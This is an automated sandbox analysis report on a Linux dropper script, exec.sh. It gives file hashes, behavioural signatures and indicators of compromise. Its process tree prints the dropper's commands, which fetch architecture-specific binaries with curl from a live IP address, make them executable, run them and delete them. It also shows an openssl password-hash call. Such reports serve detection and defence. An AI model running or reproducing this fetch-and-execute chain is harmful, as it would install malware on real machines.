Analysis
-
max time kernel
148s -
max time network
147s -
platform
debian-9_armhf -
resource
debian9-armhf-20240226-en -
resource tags
arch:armhfimage:debian9-armhf-20240226-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
13-03-2024 23:00
Static task
static1
Behavioral task
behavioral1
Sample
exec.sh
Resource
ubuntu1804-amd64-20240226-en
Behavioral task
behavioral2
Sample
exec.sh
Resource
debian9-armhf-20240226-en
Behavioral task
behavioral3
Sample
exec.sh
Resource
debian9-mipsbe-20240226-en
Behavioral task
behavioral4
Sample
exec.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
exec.sh
-
Size
842B
-
MD5
4eeac4436b9c68f85b1c3a2bae62d3f3
-
SHA1
4895bfd63ba3ae5fd97f69c4a243d4bae7eddfa1
-
SHA256
bfa195bd238473bfead86e74b796c4721d1f5281c284b96ff29d8806a82a6520
-
SHA512
e0091672dd843f9dd87b50f43c8b09711cd1b02c40a5a8e51a53878cdd213881328583e99d1d92aef5c497abdd3f181fe6f3a740aedb7d66918c05788bbd0e5b
Malware Config
Signatures
-
Executes dropped EXE 3 IoCs
Processes:
386_binaryamd64_binaryarm_binaryioc pid process /tmp/386_binary 758 386_binary /tmp/amd64_binary 769 amd64_binary /tmp/arm_binary 780 arm_binary -
Checks CPU configuration 1 TTPs 4 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Enumerates kernel/hardware configuration 1 TTPs 1 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
arm_binarydescription ioc process File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size arm_binary -
Reads runtime system information 8 IoCs
Reads data from /proc virtual filesystem.
Processes:
curlcurlcurlcurldescription ioc process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurldescription ioc process File opened for modification /tmp/arm64_binary curl File opened for modification /tmp/386_binary curl File opened for modification /tmp/amd64_binary curl File opened for modification /tmp/arm_binary curl
Processes
-
/tmp/exec.sh/tmp/exec.sh1⤵
-
/usr/bin/curlcurl -o 386_binary http://5.10.249.153:9999/3862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x 386_binary2⤵
-
/tmp/386_binary./386_binary2⤵
- Executes dropped EXE
-
/bin/rmrm -rf 386_binary2⤵
-
/usr/bin/curlcurl -o amd64_binary http://5.10.249.153:9999/amd642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x amd64_binary2⤵
-
/tmp/amd64_binary./amd64_binary2⤵
- Executes dropped EXE
-
/bin/rmrm -rf amd64_binary2⤵
-
/usr/bin/curlcurl -o arm_binary http://5.10.249.153:9999/arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
/bin/chmodchmod +x arm_binary2⤵
-
/tmp/arm_binary./arm_binary2⤵
- Executes dropped EXE
- Enumerates kernel/hardware configuration
-
/usr/bin/opensslopenssl passwd -6 scmg40I9gecr3⤵
-
/bin/rmrm -rf arm_binary2⤵
-
/usr/bin/curlcurl -o arm64_binary http://5.10.249.153:9999/arm642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
/tmp/386_binaryFilesize
420KB
MD5c844c5c14bd7b2ca8d8a585f0bb4b0c8
SHA1d5f7155b192c31f9d8842a36a92047ef171ea10f
SHA256a5f83fdef2bae782dd96949e9d1caa38440621f9b4a61008be1acda95ee87e92
SHA5128b74d415627379c8e9f862821f462406654bd40b1391a65a3c43056bf62026e3d3218d8567e14f678e172e95c0853b9bc9667c5a2c280fa891cb292d8aab8663
-
/tmp/amd64_binaryFilesize
64KB
MD5733642767a2782e29b1300f0cc3bb5af
SHA1a0f8d340e855f752f4597c833b3a0ea9d617238d
SHA256c7f031e99869413fe8e58fdf04768fc42edbadd773639eb13bddafe2161643dc
SHA51217b29aca11bf10268aa43689cd199b3adbdadcf052c2bb4365255979524ad3822546d243068f3d3a0812ac4fe1e1db4f2bee7a4183c8c626ae9c82a64572a9e4
-
/tmp/arm64_binaryFilesize
19KB
MD5f8b0a6c9ed9d33191661fce600b819ac
SHA1cd3e411eb4e115c249a25bde87f7e3d876bf245d
SHA2561364c16c4464d2840c2316bb0c9508dcfff922e121192596342189b2826d6557
SHA5127f441f9195a2ac1f01f92c081624c4eaedc0ef30d093d1990e9cb52a5da27a90a5b1abd64df75b57774fadb1b23cb35c2f41aca2325f702e687213fcdef47770
-
/tmp/arm_binaryFilesize
168KB
MD56818fc04117b0863b9489962c744bce6
SHA1ba296427584041f5fcbdb56c8280387ffe42137e
SHA256e469a8fe15ef6d6f28380f3a268423dd501d1d653b164d88412362e2f2c76b43
SHA5127a57546909cb6c4672f28575243c87aa023828cee4660e64b98b22394ebb8858ca7d812c3bd622ba57dff708bb0c09fb2df2e8768e541b4939176744fa4f062f